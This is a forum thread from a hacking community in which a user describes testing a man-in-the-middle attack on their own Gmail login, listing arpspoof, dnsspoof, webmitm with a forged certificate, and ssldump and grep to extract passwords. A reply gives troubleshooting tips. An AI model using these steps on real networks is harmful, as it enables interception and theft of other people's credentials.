Follow us on Twitter!
It is the path of least resistance that makes rivers and men crooked. - Bj Palmer
Monday, April 21, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 29
Guests Online: 26
Members Online: 3

Registered Members: 82858
Newest Member: alexxkim
Latest Articles
View Thread

HellBound Hackers | HellBound Hackers | Questions

Author

How to decrypt SSL traffic using a MITM attack


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-03-09 01:08
http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password.. what might I be doing wrong?

commands ran--

fragrouter -B1
arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD
webmitm (made a cert)
dnsspoof

wireshark (and start recording everything)

On the victim machine when I perform an nslookup on gmail , the ip address is from my local area network.

Secondly on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attackers rig.

Log in to my own account.

Switch back to the attackers rig.

Save the captured packets.

Then I ran : ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing, and I looked through the out file and it seems like I am recording the traffic that is for gmail.com .. but I can't see my own password.. any ideas?

Thank you guys for any words of wisdom.


Author

RE: How to decrypt SSL traffic using a MITM attack


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-03-09 05:46
more than one way to skin a cat

no need for fragrouter:
Code
echo "1" > /proc/sys/net/ipv4/ip_forward




and remember

Code
Lastly: cat out | grep 'Passwd




linux is case sensitive and read the manual

Code
man grep